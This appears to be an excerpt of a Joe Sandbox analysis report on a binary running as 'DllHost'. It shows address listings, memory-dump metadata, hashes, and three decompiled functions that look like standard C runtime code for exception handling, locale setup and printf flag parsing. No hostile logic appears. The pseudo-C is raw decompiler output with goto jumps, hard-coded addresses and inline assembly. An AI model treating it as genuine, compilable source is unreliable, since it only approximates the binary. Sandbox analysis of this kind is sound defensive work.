                                                                                                                                                              0x7ff7191eb492
                                                                                                                                                              0x7ff7191eb496
                                                                                                                                                              0x7ff7191eb49b
                                                                                                                                                              0x7ff7191eb4b2
                                                                                                                                                              0x7ff7191eb4bc
                                                                                                                                                              0x7ff7191eb4be
                                                                                                                                                              0x7ff7191eb4c1
                                                                                                                                                              0x7ff7191eb4c5
                                                                                                                                                              0x7ff7191eb4c9
                                                                                                                                                              0x7ff7191eb4cb
                                                                                                                                                              0x7ff7191eb4d1
                                                                                                                                                              0x7ff7191eb4df
                                                                                                                                                              0x7ff7191eb4ec
                                                                                                                                                              0x7ff7191eb4ee
                                                                                                                                                              0x7ff7191eb4f2
                                                                                                                                                              0x7ff7191eb500
                                                                                                                                                              0x7ff7191eb50d
                                                                                                                                                              0x7ff7191eb50f
                                                                                                                                                              0x7ff7191eb513
                                                                                                                                                              0x7ff7191eb521
                                                                                                                                                              0x7ff7191eb52e
                                                                                                                                                              0x7ff7191eb530
                                                                                                                                                              0x7ff7191eb538
                                                                                                                                                              0x7ff7191eb541
                                                                                                                                                              0x7ff7191eb545
                                                                                                                                                              0x7ff7191eb54a
                                                                                                                                                              0x7ff7191eb54f
                                                                                                                                                              0x7ff7191eb56c

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                              • Opcode ID: 851a857f57f4765cc1557b6bb8635308908a727c27b3e85f1c3da4bb1f5f10ca
                                                                                                                                                              • Instruction ID: d87c17797c2dc7ebb423b8fdf0b538b7a41da77a01d921a23c0e27f525717241
                                                                                                                                                              • Opcode Fuzzy Hash: 851a857f57f4765cc1557b6bb8635308908a727c27b3e85f1c3da4bb1f5f10ca
                                                                                                                                                              • Instruction Fuzzy Hash: 3A81E531E8DD1287F7676E2AA554238ABB0BF1176CFD44031C60F62595CA2DE88BB731
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D6598 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 61%
                                                                                                                                                              			E00007FF77FF7191D6598(void* __edx, intOrPtr* __rcx, void* __rdx, long long __r8, void* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t94;
				intOrPtr _t95;
				intOrPtr _t125;
				void* _t136;
				intOrPtr _t137;
				signed long long _t143;
				long long _t145;
				long long _t150;
				void* _t151;
				intOrPtr* _t171;
				long long _t182;
				long long _t183;
				intOrPtr* _t184;
				void* _t185;
				intOrPtr* _t186;
				intOrPtr* _t187;
				void* _t188;
				signed long long _t189;
				intOrPtr _t197;
				void* _t204;
				long long _t205;

				_t187 = _t188 - 0x38;
				_t189 = _t188 - 0x138;
				_t143 =  *0x192190a0; // 0x590452ce5669
				 *(_t187 + 0x28) = _t143 ^ _t189;
				_t185 = __r9;
				_t145 =  *((intOrPtr*)(_t187 + 0xb8));
				_t204 = __rdx;
				_t205 =  *((intOrPtr*)(_t187 + 0xa0));
				_t186 = __rcx;
				 *((long long*)(_t189 + 0x70)) = _t145;
				 *((long long*)(_t189 + 0x78)) = __r8;
				if ( *__rcx == 0x80000003) goto 0x191d6861;
				E00007FF77FF7191D4EF8(_t145);
				r12d =  *((intOrPtr*)(_t187 + 0xb0));
				r15d =  *((intOrPtr*)(_t187 + 0xa8));
				if ( *((long long*)(_t145 + 0x10)) == 0) goto 0x191d6660;
				__imp__EncodePointer();
				_t160 = _t145;
				E00007FF77FF7191D4EF8(_t145);
				if ( *((intOrPtr*)(_t145 + 0x10)) == _t145) goto 0x191d6660;
				if ( *__rcx == 0xe0434f4d) goto 0x191d6660;
				if ( *__rcx == 0xe0434352) goto 0x191d6660;
				 *((intOrPtr*)(_t189 + 0x38)) = r15d;
				 *(_t189 + 0x30) =  *((intOrPtr*)(_t189 + 0x70));
				 *((intOrPtr*)(_t189 + 0x28)) = r12d;
				 *((long long*)(_t189 + 0x20)) = _t205;
				if (E00007FF77FF7191D3344(__rcx, __rdx,  *((intOrPtr*)(_t189 + 0x78)), __r9) != 0) goto 0x191d6861;
				E00007FF77FF7191D7054(_t187, _t205,  *((intOrPtr*)(__r9 + 8)));
				if ( *_t187 <= 0) goto 0x191d6881;
				 *((intOrPtr*)(_t189 + 0x28)) = r12d;
				 *((long long*)(_t189 + 0x20)) = _t205;
				r8d = r15d;
				_t94 = E00007FF77FF7191D380C(_t145, _t187 - 0x70, _t187, _t185, __rcx, _t187);
				asm("movups xmm0, [ebp-0x70]");
				asm("movdqu [ebp-0x80], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t94 -  *((intOrPtr*)(_t187 - 0x58)) >= 0) goto 0x191d6861;
				_t95 =  *((intOrPtr*)(_t187 - 0x78));
				 *((long long*)(_t189 + 0x68)) =  *((intOrPtr*)(_t187 - 0x70));
				 *((intOrPtr*)(_t189 + 0x60)) = _t95;
				asm("inc ecx");
				asm("dec ax");
				asm("movups [ebp-0x80], xmm0");
				if (_t95 - r15d > 0) goto 0x191d67c7;
				_t136 = r15d - _t95;
				if (_t136 > 0) goto 0x191d67c7;
				r9d =  *((intOrPtr*)( *((intOrPtr*)(_t185 + 0x10))));
				E00007FF77FF7191D6FD8( *((intOrPtr*)(_t185 + 0x10)), _t187 - 0x50, _t187 - 0x80,  *((intOrPtr*)(_t185 + 8)));
				 *((long long*)(_t187 - 0x48)) =  *((intOrPtr*)(_t187 - 0x40));
				E00007FF77FF7191D75C4( *((intOrPtr*)(_t187 - 0x40)), _t187 - 0x50);
				_t150 =  *((intOrPtr*)(_t187 - 0x40));
				 *((long long*)(_t187 - 0x48)) = _t150;
				E00007FF77FF7191D75C4(_t150, _t187 - 0x50);
				if (_t136 == 0) goto 0x191d673e;
				E00007FF77FF7191D75C4(_t150, _t187 - 0x50);
				if (_t136 != 0) goto 0x191d672f;
				_t137 =  *((intOrPtr*)(_t187 - 0x30));
				if (_t137 == 0) goto 0x191d676c;
				E00007FF77FF7191D3DE8(_t150);
				_t151 = _t150 +  *((intOrPtr*)(_t187 - 0x30));
				if (_t137 == 0) goto 0x191d676c;
				if (__edx == 0) goto 0x191d6764;
				E00007FF77FF7191D3DE8(_t151);
				goto 0x191d6766;
				if ( *((char*)(_t151 +  *((intOrPtr*)(_t187 - 0x30)) + 0x10)) != 0) goto 0x191d67bb;
				if (( *(_t187 - 0x34) & 0x00000040) != 0) goto 0x191d67bb;
				 *((char*)(_t189 + 0x58)) = 0;
				_t171 = _t186;
				 *((char*)(_t189 + 0x50)) = 1;
				 *((long long*)(_t189 + 0x48)) =  *((intOrPtr*)(_t189 + 0x70));
				 *((intOrPtr*)(_t189 + 0x40)) = r12d;
				 *((long long*)(_t189 + 0x38)) = _t187 - 0x80;
				 *(_t189 + 0x30) =  *(_t189 + 0x30) & 0x00000000;
				 *((long long*)(_t189 + 0x28)) = _t187 - 0x38;
				 *((long long*)(_t189 + 0x20)) = _t205;
				E00007FF77FF7191D58E8(0, _t160 - 1, _t171, _t204,  *((intOrPtr*)(_t189 + 0x78)), _t185);
				_t197 =  *((intOrPtr*)(_t189 + 0x68));
				_t182 =  *((intOrPtr*)(_t197 + 8)) -  *((char*)(_t171 + 0x7ff719202b50));
				 *((long long*)(_t197 + 8)) = _t182;
				 *(_t197 + 0x18) =  *(_t182 - 4) >>  *(_t171 + 0x7ff719202b60);
				_t183 = _t182 -  *((char*)(_t171 + 0x7ff719202b50));
				 *((long long*)(_t197 + 8)) = _t183;
				 *(_t197 + 0x1c) =  *(_t183 - 4) >>  *(_t171 + 0x7ff719202b60);
				_t184 = _t183 -  *((char*)(_t171 + 0x7ff719202b50));
				 *(_t197 + 0x20) =  *(_t184 - 4) >>  *(_t171 + 0x7ff719202b60);
				 *((long long*)(_t197 + 8)) = _t184;
				 *((intOrPtr*)(_t197 + 0x24)) =  *_t184;
				_t125 =  *((intOrPtr*)(_t189 + 0x60)) + 1;
				 *((long long*)(_t197 + 8)) = _t184 + 4;
				 *((intOrPtr*)(_t189 + 0x60)) = _t125;
				if (_t125 -  *((intOrPtr*)(_t187 - 0x58)) < 0) goto 0x191d66c9;
				return E00007FF77FF7191D23B0( *(_t184 - 4) >>  *(_t171 + 0x7ff719202b60), _t125,  *(_t187 + 0x28) ^ _t189);
			}




























                                                                                                                                                              0x7ff7191d65a5
                                                                                                                                                              0x7ff7191d65aa
                                                                                                                                                              0x7ff7191d65b1
                                                                                                                                                              0x7ff7191d65bb
                                                                                                                                                              0x7ff7191d65c5
                                                                                                                                                              0x7ff7191d65c8
                                                                                                                                                              0x7ff7191d65cf
                                                                                                                                                              0x7ff7191d65d2
                                                                                                                                                              0x7ff7191d65d9
                                                                                                                                                              0x7ff7191d65dc
                                                                                                                                                              0x7ff7191d65e1
                                                                                                                                                              0x7ff7191d65e6
                                                                                                                                                              0x7ff7191d65ec
                                                                                                                                                              0x7ff7191d65f1
                                                                                                                                                              0x7ff7191d65f8
                                                                                                                                                              0x7ff7191d6604
                                                                                                                                                              0x7ff7191d6608
                                                                                                                                                              0x7ff7191d660e
                                                                                                                                                              0x7ff7191d6611
                                                                                                                                                              0x7ff7191d661a
                                                                                                                                                              0x7ff7191d6622
                                                                                                                                                              0x7ff7191d662a
                                                                                                                                                              0x7ff7191d663c
                                                                                                                                                              0x7ff7191d6644
                                                                                                                                                              0x7ff7191d6649
                                                                                                                                                              0x7ff7191d664e
                                                                                                                                                              0x7ff7191d665a
                                                                                                                                                              0x7ff7191d666b
                                                                                                                                                              0x7ff7191d6674
                                                                                                                                                              0x7ff7191d667a
                                                                                                                                                              0x7ff7191d6686
                                                                                                                                                              0x7ff7191d668b
                                                                                                                                                              0x7ff7191d6692
                                                                                                                                                              0x7ff7191d6697
                                                                                                                                                              0x7ff7191d669b
                                                                                                                                                              0x7ff7191d66a0
                                                                                                                                                              0x7ff7191d66a5
                                                                                                                                                              0x7ff7191d66ac
                                                                                                                                                              0x7ff7191d66bd
                                                                                                                                                              0x7ff7191d66c0
                                                                                                                                                              0x7ff7191d66c5
                                                                                                                                                              0x7ff7191d66c9
                                                                                                                                                              0x7ff7191d66ce
                                                                                                                                                              0x7ff7191d66d3
                                                                                                                                                              0x7ff7191d66da
                                                                                                                                                              0x7ff7191d66e4
                                                                                                                                                              0x7ff7191d66e7
                                                                                                                                                              0x7ff7191d66fd
                                                                                                                                                              0x7ff7191d6700
                                                                                                                                                              0x7ff7191d670d
                                                                                                                                                              0x7ff7191d6711
                                                                                                                                                              0x7ff7191d6716
                                                                                                                                                              0x7ff7191d6721
                                                                                                                                                              0x7ff7191d6725
                                                                                                                                                              0x7ff7191d672d
                                                                                                                                                              0x7ff7191d6733
                                                                                                                                                              0x7ff7191d673c
                                                                                                                                                              0x7ff7191d673e
                                                                                                                                                              0x7ff7191d6742
                                                                                                                                                              0x7ff7191d6744
                                                                                                                                                              0x7ff7191d674d
                                                                                                                                                              0x7ff7191d6750
                                                                                                                                                              0x7ff7191d6754
                                                                                                                                                              0x7ff7191d6756
                                                                                                                                                              0x7ff7191d6762
                                                                                                                                                              0x7ff7191d676a
                                                                                                                                                              0x7ff7191d6770
                                                                                                                                                              0x7ff7191d6782
                                                                                                                                                              0x7ff7191d6787
                                                                                                                                                              0x7ff7191d678a
                                                                                                                                                              0x7ff7191d678f
                                                                                                                                                              0x7ff7191d6798
                                                                                                                                                              0x7ff7191d679d
                                                                                                                                                              0x7ff7191d67a6
                                                                                                                                                              0x7ff7191d67ac
                                                                                                                                                              0x7ff7191d67b1
                                                                                                                                                              0x7ff7191d67b6
                                                                                                                                                              0x7ff7191d67bb
                                                                                                                                                              0x7ff7191d67e2
                                                                                                                                                              0x7ff7191d67ea
                                                                                                                                                              0x7ff7191d67ee
                                                                                                                                                              0x7ff7191d6809
                                                                                                                                                              0x7ff7191d6811
                                                                                                                                                              0x7ff7191d6815
                                                                                                                                                              0x7ff7191d6830
                                                                                                                                                              0x7ff7191d6838
                                                                                                                                                              0x7ff7191d6840
                                                                                                                                                              0x7ff7191d6846
                                                                                                                                                              0x7ff7191d684e
                                                                                                                                                              0x7ff7191d6850
                                                                                                                                                              0x7ff7191d6854
                                                                                                                                                              0x7ff7191d685b
                                                                                                                                                              0x7ff7191d6880

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                              • Opcode ID: bfa5a3bb27ae1f7f56700971ab65c28c8ae4028e3c5a8bb986bc8995bfe6fb3e
                                                                                                                                                              • Instruction ID: d6eb98ca103c4be5b4ec7733d133c8b1a4263ab25c542ae196f184d4dd971e28
                                                                                                                                                              • Opcode Fuzzy Hash: bfa5a3bb27ae1f7f56700971ab65c28c8ae4028e3c5a8bb986bc8995bfe6fb3e
                                                                                                                                                              • Instruction Fuzzy Hash: 5C91AD73A08B858AE710AF65E8442ADBBF0FB0579CF50452AEA8C17755DF38D19ADB00
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191B1BD0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 174COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 61%
                                                                                                                                                              			E00007FF77FF7191B1BD0(long long __rax, long long __rbx, long long* __rcx, void* __rdx, long long __rsi) {
				void* _t54;
				intOrPtr _t79;
				void* _t93;
				long long _t94;
				long long* _t97;
				void* _t99;
				void* _t100;
				void* _t102;
				void* _t105;
				long long _t107;

				_t70 = __rax;
				 *((long long*)(_t102 + 0x10)) = __rbx;
				 *((long long*)(_t102 + 0x18)) = __rsi;
				_t100 = _t102 - 0x47;
				_t97 = __rcx;
				if (__rcx == 0) goto 0x191b1d42;
				if ( *__rcx != 0) goto 0x191b1d42;
				E00007FF77FF7191D23D8(__rax, __rcx);
				_t94 = __rax;
				 *((long long*)(_t100 + 0x67)) = __rax;
				_t79 =  *((intOrPtr*)(__rdx + 8));
				if (_t79 == 0) goto 0x191b1c2c;
				if ( *((intOrPtr*)(_t79 + 0x28)) != 0) goto 0x191b1c33;
				goto 0x191b1c33;
				E00007FF77FF7191D0D0C(0, _t100 - 0x59);
				r14d = 0;
				 *((long long*)(_t100 - 0x51)) = _t107;
				 *((intOrPtr*)(_t100 - 0x49)) = r14b;
				 *((long long*)(_t100 - 0x41)) = _t107;
				 *((intOrPtr*)(_t100 - 0x39)) = r14b;
				 *((long long*)(_t100 - 0x31)) = _t107;
				 *((intOrPtr*)(_t100 - 0x29)) = r14w;
				 *((long long*)(_t100 - 0x21)) = _t107;
				 *((intOrPtr*)(_t100 - 0x19)) = r14w;
				 *((long long*)(_t100 - 0x11)) = _t107;
				 *((intOrPtr*)(_t100 - 9)) = r14b;
				 *((long long*)(_t100 - 1)) = _t107;
				 *((intOrPtr*)(_t100 + 7)) = r14b;
				if (0x1920f71b == 0) goto 0x191b1d5f;
				E00007FF77FF7191D12B8(_t70, 0x1920f71b, _t100 - 0x59, 0x1920f71b);
				 *((intOrPtr*)(_t94 + 8)) = r14d;
				 *_t94 = 0x19202968;
				E00007FF77FF7191D19B4(0x19202968, 0x1920f71b, _t100 + 0xf, _t105);
				asm("movups xmm0, [eax]");
				asm("movups [edi+0x10], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [edi+0x20], xmm1");
				asm("movsd xmm0, [eax+0x20]");
				asm("movsd [edi+0x30], xmm0");
				 *((intOrPtr*)(_t94 + 0x38)) =  *0x7FF719202990;
				 *_t97 = _t94;
				E00007FF77FF7191D1324(_t100 - 0x59);
				if ( *((intOrPtr*)(_t100 - 1)) == 0) goto 0x191b1cda;
				E00007FF77FF7191D9C88(0x40, 0, 0x1920f71b, 0x1920f71b, _t107);
				 *((long long*)(_t100 - 1)) = _t107;
				if ( *((intOrPtr*)(_t100 - 0x11)) == 0) goto 0x191b1cec;
				E00007FF77FF7191D9C88(0x40, 0, 0x1920f71b, 0x1920f71b, _t93);
				 *((long long*)(_t100 - 0x11)) = _t107;
				if ( *((intOrPtr*)(_t100 - 0x21)) == 0) goto 0x191b1cfe;
				E00007FF77FF7191D9C88(0x40, 0, 0x1920f71b, 0x1920f71b, _t99);
				 *((long long*)(_t100 - 0x21)) = _t107;
				if ( *((intOrPtr*)(_t100 - 0x31)) == 0) goto 0x191b1d10;
				E00007FF77FF7191D9C88(0x40, 0, 0x1920f71b, 0x1920f71b);
				 *((long long*)(_t100 - 0x31)) = _t107;
				if ( *((intOrPtr*)(_t100 - 0x41)) == 0) goto 0x191b1d22;
				E00007FF77FF7191D9C88(0x40, 0, 0x1920f71b, 0x1920f71b);
				 *((long long*)(_t100 - 0x41)) = _t107;
				if ( *((intOrPtr*)(_t100 - 0x51)) == 0) goto 0x191b1d34;
				_t54 = E00007FF77FF7191D9C88(0x40, 0, 0x1920f71b, 0x1920f71b);
				 *((long long*)(_t100 - 0x51)) = _t107;
				E00007FF77FF7191D0D84(_t54, _t100 - 0x59);
				return 2;
			}













                                                                                                                                                              0x7ff7191b1bd0
                                                                                                                                                              0x7ff7191b1bd0
                                                                                                                                                              0x7ff7191b1bd5
                                                                                                                                                              0x7ff7191b1bde
                                                                                                                                                              0x7ff7191b1bed
                                                                                                                                                              0x7ff7191b1bf3
                                                                                                                                                              0x7ff7191b1bfd
                                                                                                                                                              0x7ff7191b1c08
                                                                                                                                                              0x7ff7191b1c0d
                                                                                                                                                              0x7ff7191b1c10
                                                                                                                                                              0x7ff7191b1c14
                                                                                                                                                              0x7ff7191b1c1b
                                                                                                                                                              0x7ff7191b1c24
                                                                                                                                                              0x7ff7191b1c2a
                                                                                                                                                              0x7ff7191b1c39
                                                                                                                                                              0x7ff7191b1c3f
                                                                                                                                                              0x7ff7191b1c42
                                                                                                                                                              0x7ff7191b1c46
                                                                                                                                                              0x7ff7191b1c4a
                                                                                                                                                              0x7ff7191b1c4e
                                                                                                                                                              0x7ff7191b1c52
                                                                                                                                                              0x7ff7191b1c56
                                                                                                                                                              0x7ff7191b1c5b
                                                                                                                                                              0x7ff7191b1c5f
                                                                                                                                                              0x7ff7191b1c64
                                                                                                                                                              0x7ff7191b1c68
                                                                                                                                                              0x7ff7191b1c6c
                                                                                                                                                              0x7ff7191b1c70
                                                                                                                                                              0x7ff7191b1c77
                                                                                                                                                              0x7ff7191b1c84
                                                                                                                                                              0x7ff7191b1c8a
                                                                                                                                                              0x7ff7191b1c95
                                                                                                                                                              0x7ff7191b1c9c
                                                                                                                                                              0x7ff7191b1ca1
                                                                                                                                                              0x7ff7191b1ca4
                                                                                                                                                              0x7ff7191b1ca8
                                                                                                                                                              0x7ff7191b1cac
                                                                                                                                                              0x7ff7191b1cb0
                                                                                                                                                              0x7ff7191b1cb5
                                                                                                                                                              0x7ff7191b1cbd
                                                                                                                                                              0x7ff7191b1cc0
                                                                                                                                                              0x7ff7191b1cc7
                                                                                                                                                              0x7ff7191b1cd3
                                                                                                                                                              0x7ff7191b1cd5
                                                                                                                                                              0x7ff7191b1cda
                                                                                                                                                              0x7ff7191b1ce5
                                                                                                                                                              0x7ff7191b1ce7
                                                                                                                                                              0x7ff7191b1cec
                                                                                                                                                              0x7ff7191b1cf7
                                                                                                                                                              0x7ff7191b1cf9
                                                                                                                                                              0x7ff7191b1cfe
                                                                                                                                                              0x7ff7191b1d09
                                                                                                                                                              0x7ff7191b1d0b
                                                                                                                                                              0x7ff7191b1d10
                                                                                                                                                              0x7ff7191b1d1b
                                                                                                                                                              0x7ff7191b1d1d
                                                                                                                                                              0x7ff7191b1d22
                                                                                                                                                              0x7ff7191b1d2d
                                                                                                                                                              0x7ff7191b1d2f
                                                                                                                                                              0x7ff7191b1d34
                                                                                                                                                              0x7ff7191b1d3c
                                                                                                                                                              0x7ff7191b1d5e

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                              • API String ID: 2775327233-1405518554
                                                                                                                                                              • Opcode ID: c3bf6fb30db763af22e504c8035b4baf73cd55e5f8f1d2a8d1cab8f8ced3d243
                                                                                                                                                              • Instruction ID: 9becb11d108bd2019d8f0f402f62d74f3b215200dd322e2c625cb2d321dab749
                                                                                                                                                              • Opcode Fuzzy Hash: c3bf6fb30db763af22e504c8035b4baf73cd55e5f8f1d2a8d1cab8f8ced3d243
                                                                                                                                                              • Instruction Fuzzy Hash: 86717B22B09F8189FB10EF61E4802AD73B5BF447A8F844135DE4E27A55CF38D5AAE310
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191DADD4 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 154COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                              			E00007FF77FF7191DADD4(signed int __edi, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, signed int __rsi, long long __rbp, long long _a16, long long _a24, long long _a32) {
				intOrPtr _t80;
				unsigned int _t89;
				signed int _t96;
				signed int _t98;
				char _t100;
				signed int _t103;
				unsigned int _t111;
				intOrPtr _t128;
				void* _t133;
				signed int _t143;

				_t143 = __rsi;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t103 = __edi | 0xffffffff;
				_t133 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x468)) == __rsi) goto 0x191dafd8;
				if ( *((intOrPtr*)(__rcx + 0x18)) != __rsi) goto 0x191dae1a;
				E00007FF77FF7191DC854(__rax);
				 *__rax = 0x16;
				E00007FF77FF7191DA5D8();
				goto 0x191dafc3;
				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x191dafc0;
				 *((intOrPtr*)(__rcx + 0x50)) = 0;
				 *(__rcx + 0x2c) = 0;
				goto 0x191daf8d;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x191dafa2;
				if (__rcx - 0x20 - 0x5a > 0) goto 0x191dae6a;
				asm("lfence");
				_t128 =  *((intOrPtr*)(__rcx + 0x41));
				goto 0x191dae6c;
				_t89 = ( *(__rcx + 0x19203c30) & 0x000000ff) >> 4;
				 *(__rcx + 0x2c) = _t89;
				if (_t89 == 8) goto 0x191dafd8;
				_t111 = _t89;
				if (_t111 == 0) goto 0x191daf81;
				if (_t111 == 0) goto 0x191daf6d;
				if (_t111 == 0) goto 0x191daf38;
				if (_t111 == 0) goto 0x191daf0c;
				if (_t111 == 0) goto 0x191daf04;
				if (_t111 == 0) goto 0x191daed7;
				if (_t111 == 0) goto 0x191daeca;
				if (_t89 - 0xfffffffffffffffc != 1) goto 0x191dafe8;
				E00007FF77FF7191DB488(__rcx, __rcx, __rsi, 0x19203c30);
				goto 0x191daf89;
				E00007FF77FF7191DB314(_t128, _t133);
				goto 0x191daf89;
				if ( *((char*)(_t133 + 0x41)) == 0x2a) goto 0x191daeee;
				E00007FF77FF7191DAD30(_t128, _t133, _t133, _t133 + 0x38, 0x19203c30);
				goto 0x191daf89;
				 *((long long*)(_t133 + 0x20)) =  *((long long*)(_t133 + 0x20)) + 8;
				_t96 =  *( *((intOrPtr*)(_t133 + 0x20)) - 8);
				_t97 =  <  ? _t103 : _t96;
				 *(_t133 + 0x38) =  <  ? _t103 : _t96;
				goto 0x191daf34;
				 *(_t133 + 0x38) = 0;
				goto 0x191daf8d;
				if ( *((char*)(_t133 + 0x41)) == 0x2a) goto 0x191daf18;
				goto 0x191daee1;
				 *((long long*)(_t133 + 0x20)) =  *((long long*)(_t133 + 0x20)) + 8;
				_t98 =  *( *((intOrPtr*)(_t133 + 0x20)) - 8);
				 *(_t133 + 0x34) = _t98;
				if (_t98 >= 0) goto 0x191daf34;
				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000004;
				 *(_t133 + 0x34) =  ~_t98;
				goto 0x191daf89;
				_t80 =  *((intOrPtr*)(_t133 + 0x41));
				if (_t80 == 0x20) goto 0x191daf67;
				if (_t80 == 0x23) goto 0x191daf61;
				if (_t80 == 0x2b) goto 0x191daf5b;
				if (_t80 == 0x2d) goto 0x191daf55;
				if (_t80 != 0x30) goto 0x191daf8d;
				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000008;
				goto 0x191daf8d;
				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000004;
				goto 0x191daf8d;
				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000001;
				goto 0x191daf8d;
				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000020;
				goto 0x191daf8d;
				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000002;
				goto 0x191daf8d;
				 *(_t133 + 0x30) = _t143;
				 *((intOrPtr*)(_t133 + 0x40)) = sil;
				 *(_t133 + 0x38) = _t103;
				 *((intOrPtr*)(_t133 + 0x3c)) = 0;
				 *((intOrPtr*)(_t133 + 0x54)) = sil;
				goto 0x191daf8d;
				if (E00007FF77FF7191DB1F8(_t133) == 0) goto 0x191dafe8;
				_t100 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18))));
				 *((char*)(_t133 + 0x41)) = _t100;
				if (_t100 != 0) goto 0x191dae3f;
				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 1;
				if ( *((intOrPtr*)(_t133 + 0x2c)) == 0) goto 0x191dafad;
				if ( *((intOrPtr*)(_t133 + 0x2c)) != 7) goto 0x191dafd8;
				 *((intOrPtr*)(_t133 + 0x470)) =  *((intOrPtr*)(_t133 + 0x470)) + 1;
				if ( *((intOrPtr*)(_t133 + 0x470)) != 2) goto 0x191dae34;
				return  *((intOrPtr*)(_t133 + 0x28));
			}













                                                                                                                                                              0x7ff7191dadd4
                                                                                                                                                              0x7ff7191dadd4
                                                                                                                                                              0x7ff7191dadd9
                                                                                                                                                              0x7ff7191dadde
                                                                                                                                                              0x7ff7191dade8
                                                                                                                                                              0x7ff7191daded
                                                                                                                                                              0x7ff7191dadf7
                                                                                                                                                              0x7ff7191dae01
                                                                                                                                                              0x7ff7191dae03
                                                                                                                                                              0x7ff7191dae08
                                                                                                                                                              0x7ff7191dae0e
                                                                                                                                                              0x7ff7191dae15
                                                                                                                                                              0x7ff7191dae1a
                                                                                                                                                              0x7ff7191dae27
                                                                                                                                                              0x7ff7191dae34
                                                                                                                                                              0x7ff7191dae37
                                                                                                                                                              0x7ff7191dae3a
                                                                                                                                                              0x7ff7191dae3f
                                                                                                                                                              0x7ff7191dae46
                                                                                                                                                              0x7ff7191dae57
